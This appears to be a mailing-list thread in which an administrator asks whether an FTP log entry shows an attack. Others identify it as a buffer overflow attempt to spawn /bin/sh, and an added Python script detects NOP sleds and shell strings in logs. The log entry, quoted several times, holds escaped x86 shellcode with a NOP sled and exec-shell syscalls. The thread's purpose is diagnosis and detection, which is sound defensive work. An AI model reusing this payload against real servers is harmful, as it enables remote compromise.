Hi, my server registered the following entry:
Jan 11 06:02:36 cumana in.ftpd[23016]: connect from pedro@150.185.69.34
Jan 11 06:02:36 cumana ftpd[23016]: connection from complex.ciens.ucv.ve
Jan 11 06:02:37 cumana ftpd[23016]: ANONYMOUS FTP LOGIN FROM complex.ciens.ucv.ve ~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~ P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P ~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~ P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~ P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~ P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P ~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~ P~P~P~P~P~P~P~P~P~P1À1Û1É°FÍ~@1À1ÛC~IÙA°?Í~@ëk^1À1É~M^^A~HF^Df¹ÿ^A°'Í~@1À~M^^ A°=Í~@1À1Û~M^^H~IC^B1ÉþÉ1À~M^^H°^LÍ~@þÉuó1À~HF^I~M^^H°=Í~@þ^N°0þÈ~HF^D1À~HF^ G~Iv^H~IF^L~Ió~MN^H~MV^L°^KÍ~@1À1Û°^AÍ~@è~Pÿÿÿ0bin0sh1..11
Is this message a possible attack?
Thanks.
Luis.
Luis José Fabbiani B. (SOPORTE) wrote:
Hi, my server registered the following entry:
Jan 11 06:02:36 cumana in.ftpd[23016]: connect from pedro@150.185.69.34
Jan 11 06:02:36 cumana ftpd[23016]: connection from complex.ciens.ucv.ve
Jan 11 06:02:37 cumana ftpd[23016]: ANONYMOUS FTP LOGIN FROM complex.ciens.ucv.ve ~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~ P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P ~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~ P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~ P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~ P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P ~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~ P~P~P~P~P~P~P~P~P~P1À1Û1É°FÍ~@1À1ÛC~IÙA°?Í~@ëk^1À1É~M^^A~HF^Df¹ÿ^A°'Í~@1À~M^^ A°=Í~@1À1Û~M^^H~IC^B1ÉþÉ1À~M^^H°^LÍ~@þÉuó1À~HF^I~M^^H°=Í~@þ^N°0þÈ~HF^D1À~HF^ G~Iv^H~IF^L~Ió~MN^H~MV^L°^KÍ~@1À1Û°^AÍ~@è~Pÿÿÿ0bin0sh1..11
Is this message a possible attack?
Thanks.
Luis.
Yes... Or somebody wanted you to be scared or sth.

Anyway, there is a /bin/sh string visible in the last line - a sign that this probably was an exec(/bin/sh) try...

Grzegorz Prokopski

PS: Anyway, you should check the consistency of your filesystem after all... and the logs. But probably somebody tried to use an exploit for another ftp daemon than yours (or an older version of it). Else he probably wouldn't leave the logs.
Hi, my server registered the following entry:
Jan 11 06:02:36 cumana in.ftpd[23016]: connect from pedro@150.185.69.34 Jan 11 06:02:36 cumana ftpd[23016]: connection from complex.ciens.ucv.ve Jan 11 06:02:37 cumana ftpd[23016]: ANONYMOUS FTP LOGIN FROM complex.ciens.ucv.ve ~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~ P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P ~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~ P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~ P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~ P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P ~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~ P~P~P~P~P~P~P~P~P~P1À1Û1É°FÍ~@1À1ÛC~IÙA°?Í~@ëk^1À1É~M^^A~HF^Df¹ÿ^A°'Í~@1À~M^^ A°=Í~@1À1Û~M^^H~IC^B1ÉþÉ1À~M^^H°^LÍ~@þÉuó1À~HF^I~M^^H°=Í~@þ^N°0þÈ~HF^D1À~HF^ G~Iv^H~IF^L~Ió~MN^H~MV^L°^KÍ~@1À1Û°^AÍ~@è~Pÿÿÿ0bin0sh1..11
Is this message a possible attack?
Yes, it is. This is clearly a buffer overflow attack. Please mail me (privately for now) the ftp server you're using, and which version. I'll summarize.
Thanks.
Luis.
Thanks,
Roman.
--
- -
| Roman Drahtmüller
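Both replies above point at the same two indicators in the logged line: the long run of `~P` (each one a 0x90 byte, the x86 NOP, so the run is the padding of an overflow payload) and the `/bin/sh` string near the end. The Python script below is an added example, not code from this thread or from any of its participants. It decodes the escaped rendering shown in the log (an assumed convention, inferred from the excerpt itself: `^X` for a control byte, `~X` for that control byte plus 0x80, Latin-1 for everything else, so that `Í~@` is `CD 80`, `int 0x80`) and flags lines that carry a NOP run or a syscall plus a shell string. The sample log lines are constructed, and all function and constant names are my own.

```python
import re
from typing import Dict, Iterable, List, Tuple

# Decoder for the escaped rendering used in the thread's log excerpt.
# Assumed convention, inferred from the excerpt ("Í~@" = CD 80 = int 0x80,
# "~P" = 0x90 = x86 NOP): "^X" is the control byte X-0x40, "~X" is that
# control byte with the high bit set (0x80-0x9F), and any other character
# is the Latin-1 byte with the same code point.
_TOKEN = re.compile(r"\^(.)|~(.)|(.)", re.DOTALL)


def decode_escaped(text: str) -> bytes:
    """Turn one escaped log line back into the raw bytes the daemon saw."""
    out = bytearray()
    for ctrl, meta, plain in _TOKEN.findall(text):
        if ctrl:
            out.append(ord(ctrl) ^ 0x40)            # "^@" -> 0x00, "^P" -> 0x10
        elif meta:
            out.append((ord(meta) ^ 0x40) | 0x80)   # "~@" -> 0x80, "~P" -> 0x90
        else:
            out.append(ord(plain) & 0xFF)           # Latin-1 printable byte
    return bytes(out)


def longest_run(data: bytes, value: int) -> int:
    """Length of the longest run of `value` bytes in `data`."""
    best = cur = 0
    for b in data:
        cur = cur + 1 if b == value else 0
        if cur > best:
            best = cur
    return best


X86_NOP = 0x90
INT80 = b"\xcd\x80"
# "bin/sh" with at most one non-letter between the words: payloads often
# carry a placeholder byte that is patched at run time, as in the
# "0bin0sh" seen in the excerpt.
SHELL_STRING = re.compile(rb"bin[^A-Za-z]?sh")


def analyze_line(line: str, min_sled: int = 32) -> Dict[str, object]:
    """Score one syslog line for signs of an injected overflow payload."""
    raw = decode_escaped(line)
    nop_run = longest_run(raw, X86_NOP)
    non_text = sum(1 for b in raw if b >= 0x80 or (b < 0x20 and b != 0x09))
    result: Dict[str, object] = {
        "longest_nop_run": nop_run,
        "nop_sled": nop_run >= min_sled,
        "int80": INT80 in raw,
        "shell_string": SHELL_STRING.search(raw) is not None,
        "non_text_bytes": non_text,
    }
    # A sled alone is enough to flag; a syscall plus a shell string without
    # a sled (payloads padded some other way) also earns a look.
    result["suspicious"] = bool(
        result["nop_sled"] or (result["int80"] and result["shell_string"])
    )
    return result


def scan(lines: Iterable[str]) -> List[Tuple[int, Dict[str, object]]]:
    """Return (line number, analysis) for every suspicious line."""
    hits = []
    for n, line in enumerate(lines, start=1):
        r = analyze_line(line)
        if r["suspicious"]:
            hits.append((n, r))
    return hits


# Constructed sample in the same escaped rendering (not the thread's own
# entry): a benign connect line and a login line carrying a 40-byte NOP
# sled, one int 0x80 and a "/bin/sh" string. The payload is filler, not
# working code.
SAMPLE_LOG = [
    "Jan 11 06:02:36 host ftpd[23016]: connection from client.example.org",
    "Jan 11 06:02:37 host ftpd[23016]: ANONYMOUS FTP LOGIN FROM client.example.org "
    + "~P" * 40 + "Í~@/bin/sh",
]

if __name__ == "__main__":
    for n, r in scan(SAMPLE_LOG):
        print(f"line {n}: NOP run {r['longest_nop_run']}, int80={r['int80']}, "
              f"shell string={r['shell_string']}")
```

Run over the sample, only the second line is reported. Lowering `min_sled` catches shorter sleds at the cost of more false positives on binary garbage in logs, and the decoder is only right for this particular escaping; a daemon that logs raw bytes or uses `M-^P` style escapes needs a different first step.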
~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~ P~P~P~P~P~P~P~P~P~P1À1Û1É°FÍ~@1À1ÛC~IÙA°?Í~@ëk^1À1É~M^^A~HF^Df¹ÿ^A°'Í~@1À~M^^ A°=Í~@1À1Û~M^^H~IC^B1ÉþÉ1À~M^^H°^LÍ~@þÉuó1À~HF^I~M^^H°=Í~@þ^N°0þÈ~HF^D1À~HF^ G~Iv^H~IF^L~Ió~MN^H~MV^L°^KÍ~@1À1Û°^AÍ~@è~Pÿÿÿ0bin0sh1..11
Is this message a possible attack?
Yes, it is. This is clearly a buffer overflow attack.
Please mail me (privately for now) the ftp server you're using, at which version.
I'll summarize.
There have been questions about why I asked to reply privately.
Two things: First off, it was never said that this is a full-disclosure
security mailing list. Nobody _must_ enclose all details, but everybody
_can_. If Luis decides to do so, I'm one of those who can easiest live
with it. I'm concerned about _his_ privacy in this matter.
Second: I don't want that people provide any information about their setup
on this list, especially if language skills might lead to
misunderstandings. As far as I'm concerned: As soon as I know what's
broken and if it's exploitable, I know enough to find my first victim...
Promise: I'll summarize everything as soon as I can.
Roman.
--
- -
| Roman Drahtmüller
~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~ P~P~P~P~P~P~P~P~P~P1À1Û1É°FÍ~@1À1ÛC~IÙA°?Í~@ëk^1À1É~M^^A~HF^Df¹ÿ^A°'Í~@1À~M^^ A°=Í~@1À1Û~M^^H~IC^B1ÉþÉ1À~M^^H°^LÍ~@þÉuó1À~HF^I~M^^H°=Í~@þ^N°0þÈ~HF^D1À~HF^ G~Iv^H~IF^L~Ió~MN^H~MV^L°^KÍ~@1À1Û°^AÍ~@è~Pÿÿÿ0bin0sh1..11
Is this message a possible attack?
FYI:
I haven't got any information back from Luis, except for a request for a
description of how to know the versions of the packages installed.
Roman.
--
- -
| Roman Drahtmüller
participants (3): Grzegorz Prokopski, Luis José Fabbiani B. (SOPORTE), Roman Drahtmueller